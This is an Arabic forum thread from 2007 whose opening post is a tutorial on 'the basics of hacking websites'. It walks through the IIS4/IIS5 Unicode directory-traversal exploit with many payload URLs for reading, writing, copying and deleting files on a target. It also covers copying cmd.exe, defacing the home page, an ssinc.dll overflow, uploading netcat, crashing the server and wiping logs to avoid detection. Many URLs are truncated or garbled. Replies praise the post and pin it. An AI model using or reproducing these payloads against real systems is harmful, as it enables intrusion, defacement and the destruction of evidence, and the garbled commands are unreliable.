الصفحة الرئيسية
هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.

اساسيات اختراق المواقع

3 مشترك

اذهب الى الأسفل

اساسيات اختراق المواقع Empty اساسيات اختراق المواقع

مُساهمة من طرف M.BALLACK الجمعة مارس 02, 2007 7:56 pm


اليوم جايب لكم موضوع يخص اساسيات اختراق الموقع

أساسيات اختراق المواقع
-----------------------------
-----------------------------
1-مقدمة
2- جمع معلومات عن الموقع
3- كشف ثغرات الموقع او أكتشاف ثغرات جديدة
4- كيفية أستغلال ثغرات اليونيكود والثغرات العادية
5- ملف passwd وماهي فائدته
6- كيفية فك تشفير ملف passwd
7- اذا كان ملف passwd مضلل ماذا تفعل
8- فك تشفير ملف passwd بعد دمجه مع ملف shadow
9- كيفية استغلال الباس’’" class="inlineimg" />

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

* اولا: مقدمة: اختراق المواقع شيء سهل جدا ولا يحتاج الى مخترعين ولا الى خبراء وانما تفتيح مخ اظن الكلام واضح وشوية صبر وحركات ولا برامج ولا افلان هندى ده شرح تفصيلى

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

* ثانيا: جمع معلومات عن الموقع(او السيرفر):
ّّّّّّّّجمع االمعلومات عن الموقع تكون بأحد المواقع التي تقدم خدمه جمع المعلومات عن السيرفر مثل هذا االموقع

http://www.netcraft.com

فائدة جمع المعلومات عن السيرفر هي لمعرفة الثغرات اللازمة له فمثلا لنظام وندوز ان تي ثغرات اليونكود منتشره فيه واظن انه النظام الوحيد الذي توجد فيه وهي تعتبر اسهل الثغرات وسوف اتكلم عنها في هذا الموضوع من موضوع Sniper_hEx

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

* ثالثا : كشف ثغرات الموقع او أكتشاف ثغرات جديدة:
كشف ثغرات الموقع لها برامج كثثييرة جدا سوف اقول لكم احسنها واسرعها برنامج عمران عنوان البرنامج من X-Demon-X او يمكنك الأستعانة بأحد برامج كشف الثغرات

http://www.glocksoft.com/.down/aat4xx.zip

اما اكتشاف الثغرات جديد وهو الأصعب وهو لا يمكن الا للمبرمجين مثل الذين يعرفون لغة cgi ويعرفون اماكن الباس’’" class="inlineimg" />ات او يمكن اي يكون صدفة مثل ان يضع اسم مجلد في السيرفر مثل xxxx.COM/almjde/ وبذلك يدخل الى مجلد الموقع من السيرفر ويأتي بملف congif.php
الذي يكون فيه باس’’" class="inlineimg" /> الموقع في أغلب الأحيان يكون مجلد Admin مؤمن وبذلك يستحيل اخراج ملف congif لا اظنهم اكتشفوا طريقة لفك تأمين مجلد الأدمن الى الان على حد علمي

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

* رابعا: كيف يتم استغلال ثغرات اليونيكود والثغرات العادية

اولا ثغرات اليونيكود مأخوذ من موضوع سنايبر هيكس


UNICODE - Internet Information Service IIS4 - IIS5
اليونيكود – نظام خدمة المعلومات للانترنت الاصدار الرابع – الخامس
sNiper_hEx - sNiper_hEx__Hotmail.Com


* يحتوى الدرس الاول على ( 13 نقطة )..
- تعريف باليونيكود .
- تاريخ ظهور هذه الثغرة .
- كيفية ايجاد هذه الثغرات .
- كيف يتم استغلال ثغرات اليونكود .
- الاوامر المستخدمة بواسطة ملف CMD .
- طريقة تطبيق هذه الثغرات .
- كيفية اختصار ثغرة اليونيكود حتى تتمكن من تفعيل امر الـ ECHO .
- طريقة نسخ ملف الـ CMD لاتاحة امكانية الكتابة على الملفات .
- كيفية معرفة مشكلة الـ Access Denied والحلول المتبعة لها .
- كيفية عمل اكاونت للدخول بواسطة الـFTP .
- طريقة كشف باس’’" class="inlineimg" /> الادمينستريتور .
- تغيير الصفحة الرئيسية للموقع وعملية الاب لوود بواسطة برنامج TFTP .
- مسح ملفات اللوق حتى لا يتم التعرف عليك .

ّّّّّّّّّّّّّّ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

- تعريف باليونيكود .
*اليونيكود عبارة عن مجموعة من الثغرات في مجموعة خدمة المعلومات التي ركبت مع IIS4.0 / IIS5.0 والذي ياتي عادة مع NT4 / Win2k .


- تاريخ ظهور هذه الثغرة .
*لايوجد تاريخ محدد لظهور اول ثغرة لليونيكود لذا يعتبر ظهورها بواسطة شخص مجهول anonymous person ، وقيل ان اول ظهور لثغرات اليونيكود كانت بواسطة الصينين ولكن لايوجد مايثبت صحة هذا الكلام لهذه الثغرات ، فتم استغلال هذه الثغرات من قبل المخترقين وتطوير البرامج اللازمة لها .


- كيفية ايجاد هذه الثغرات .
يتم ايجاد هذه الثغرات بطريقتين :-
1- بواسطة البرامج اللازمة والمخصصة لكشف هذه الثغرات سواء بالبرامج التي تعمل على نظام ويندوز او بطريقة الشل والتي تعمل على نظام لينكس .
2- بواسطة تطبيق الثغرة على الموقع مباشرة .


- كيف يتم استغلال ثغرات اليونكود .
عند تطبيق الثغرة على نظام الـ IIS4 / IIS5 يبدا ملف CMDبفك شفرة اليونكود في المثال الخطاء ومن هنا يتم استغلالها .




-الاوامر المستخدمة بواسطة ملف CMD .

* الاوامر المستخدمه بواسطة ملف الـCMD وهي امر لانشاء دليل جديد وامر لالغاء دليل وامر النسخ وامر النقل وامر الحذف وامر تغيير اسماء الملفات وامر لرؤية محتويات الملف وامر الكتابة داخل أي ملف وامر لسحب أي ملف ، وهي حسب الامثلة التالية :-
امر انشاء دليل جديد: http://www.xxxx.com/msadc/..%c0%af....xe?/c+md+c:hEx

* امر الغاء دليل: http://www.xxxx.com/msadc/..%c0%af....xe?/c+rd+c:hEx
للمعلومية : لايمكن الغاء أي دليل الا اذا كان فارغاً تمام من الملفات والمجلدات

* الامر المستخدم للنسخ
http://www.xxxx.com/msadc/..%c0%af....scriptshEx.exe

* الامر المستخدم للنقل
http://www.xxxx.com/msadc/..%c0%af....ptshEx.exe+c:

* الامر المستخدم للحذف
http://www.xxxx.com/msadc/..%c0%af....+del+c:hEx.mdb


* الامر المستخدم لتغيير مسمى الملفات
http://www.xxxx.com/msadc/..%c0%af....dex.htm+hEx.htm


* الامر المستخدم لرؤية محتويات الملف
http://www.xxxx.com/msadc/..%c0%af....type+c:hEx.txt


* الامر المستخدم للكتابة داخل أي ملف
http://www.xxxx.com/msadc/..%c0%af....cho+sNiper_hEx+>c:hEx.txt

* الامر المستخدم لعملية سحب أي ملف
عليك القيام اولاً بنسخ الملف المراد سحبه الى أي دليل وبعدها يتم كتابة اسم الملف في اخر العنوان كالتالي
http://www.xxxx.com/msadc/hEx.mdb


- طريقة تطبيق هذه الثغرات
تطبيق الثغرة على الموقع من خلال المتصفح تتم حسب الامثلة التالية

http://www.xxxx.com/scripts/..%c1%1....exe?/c+dir+c:
http://www.xxxx.com/scripts/..%c0%9....exe?/c+dir+c:
http://www.xxxx.com/scripts/..%c0%a....exe?/c+dir+c:
http://www.xxxx.com/scripts/..%c0%q....exe?/c+dir+c:
http://www.xxxx.com/scripts/..%c1%8....exe?/c+dir+c:
http://www.xxxx.com/scripts/..%c1%9....exe?/c+dir+c:
http://www.xxxx.com/scripts/..%c1%p....exe?/c+dir+c:

وقد نحتاج الى تغيير مسمى الدليل بحيث يكون
Msadc , _vti_bin , iisadmpwd , _vit_admin , scripts , samples , cgi-bin


- كيفية اختصار ثغرة اليونيكود حتى تتمكن من تفعيل امر الـ ECHO

* في حالة اكتشاف موقع يعاني من مشكلة اليونيكود ولنفترض انه كان على هذه الثغرة

http://www.xxxx.com/msadc/..%c0%af.....exe?/c+dir+c:

* فنحتاج الى نسخ ملف w3svc.exe الى مجلد inetpubscripts والامر يكون بهذه الطريقة

http://www.xxxx.com/msadc/..%c0%af....riptsw3svc.exe

* بعد نسخ ملف w3svc.exe الى مجلد inetpubscripts ، الان نقوم بتصفح الموقع من خلال الثغرة بهذه الطريقة

http://www.xxxx.com/scripts/w3svc.exe?/c+dir+c:

* الان نستطيع الكتابة داخل أي ملف وبالتحديد الملف الرئيسي للموقع الذي غالبا مايكون في هذا الدليل

inetpubwwwrootindex.htm بحيث يكون الامر بالشكل التالي
http://www.xxxx.com/scripts/w3svc.e...ay__Hotmail.com+>+c:inetpubwwwrootind e x.htm


- طريقة نسخ ملف الـCMD لاتاحة امكانية الكتابة على الملفات .
الغرض من نسخ ملف الـCMD وهو لاعطاء امكانية للكتابة داخل السيرفر في بعض الحالات ويتم نسخه الى مجلد السيكربت بهذه الطريقة

http://www.xxxx.com/msadc/..%c0%af....criptscmd1.exe

الان بامكاننا استخدام ملف الـCMD الجديد في الثغرة بدلا من الاول بهذا الشكل

http://www.xxxx.com/msadc/..%c0%af....1.exe?c+dir+c:


- كيفية معرفة مشكلة الـ Access Denied والحلول المتبعة لها
تتم معرفة مشكلة الـAccess Denied من خلال المحاولة في حذف أي ملف من أي امتداد فعند ظهور رسالة الـ Access Denied فاليك هذه الطرق حتى تتمكن من الكتابة على الملفات والتحكم اكثر على السيرفر

1- الطريقة الاولى نسخ ملف الـ CMD الى دليل السيكربت بمسمى CMD1 فسوف يتاح لك امكانية الكتابة باستخدام الامر Copy باستخدام هذا الامر

http://www.xxxx.com/msadc/..%c0%af....criptscmd1.exe

2- الطريقة الثانية بالتعامل مع الملف ssinc.dll والطريقة كما يلي

* اولا انشاء صفحة باسم test.shtml
* تكون هذه الصفحة داخل مجلد wwwroot/hEx/test.shtml
* كتابة هذا الكود داخل الصفحة بحيث ان حرف A يتم كتابتة حتى يتعدى 2049 حرف .
* الان يتم طلب الصفحة من خلال المتصفح http://www.xxxx.com/test.shtml
* الان سوف تظهر لك الصفحة .
* الان تستطيع الكتابه وتم تخطي مشكلة الـAccess Denied .
* اذا ظهرت لك صفحة الخطاء رقم 500 فمعناها انك لم تقم بتطبيق الطريقة بالشكل الصحيح وعليك اعادة المحاولة .

3- الطريقة الثالثة باستخدام برنامج NC.exe بحيث يتم عمل اب لوود لهذا الملف داخل مجلد الـTemp في دليل الويندوز ومنه يتم تنفيذ الاوامر من خلال موجة الدوز وللمعلومية مجلد الـTemp مفتوح لعمليات الاب لوود .

4- الطريقة الرابعة وهي من خلال عمل كراش للسيرفر باستخدام البرامج اللازمة لهذا الغرض وهذه الطريقة غير مجديه في كثير من الاحيان .

5- البحث عن ملفات : root.exe ، sensepost.exe ، shell.exe ، w3svc.exe ونسخها الى مجلد c:inetpubscripts وتطبيق الثغرة من خلالها .

m.ballack

M.BALLACK
عضو جديد
عضو جديد

عدد الرسائل : 31
العمر : 34
تاريخ التسجيل : 26/02/2007

الرجوع الى أعلى الصفحة اذهب الى الأسفل

اساسيات اختراق المواقع Empty رد: اساسيات اختراق المواقع

مُساهمة من طرف NADIMNET السبت مارس 03, 2007 6:32 am

اخي نورس جزاك الله عنا كل خير
اولاً انت إنسان نشيط جداً
ثانياً خرج تصير مخترق مواقع بس دير بالك موقعي لا تقرب صوبو هههههههههههههههه
عم مزح
وبرأي انو نحن ما ننضر حدى بس ننوعيون شو هوه الإختراق
وكيف نحمي حالنا منون
شكراً جزيلاً
NADIMNET
NADIMNET
Admin
Admin

عدد الرسائل : 15
العمر : 33
تاريخ التسجيل : 25/02/2007

https://nado.banouta.net

الرجوع الى أعلى الصفحة اذهب الى الأسفل

اساسيات اختراق المواقع Empty رد: اساسيات اختراق المواقع

مُساهمة من طرف مجودة الأحد مارس 04, 2007 8:00 am

حبيبي موضوعك جميل جداً ومهم للمنتدى لذلك تم نقله إلى قسم المشاركات المميزة وتم تثبيته أيضاً
محبتي من مجد الإسلام..........مجودة©
مجودة
مجودة
Admin
Admin

عدد الرسائل : 10
العمر : 35
تاريخ التسجيل : 25/02/2007

http://www.freepen.homegoo.com

الرجوع الى أعلى الصفحة اذهب الى الأسفل

الرجوع الى أعلى الصفحة

- مواضيع مماثلة

 
صلاحيات هذا المنتدى:
لاتستطيع الرد على المواضيع في هذا المنتدى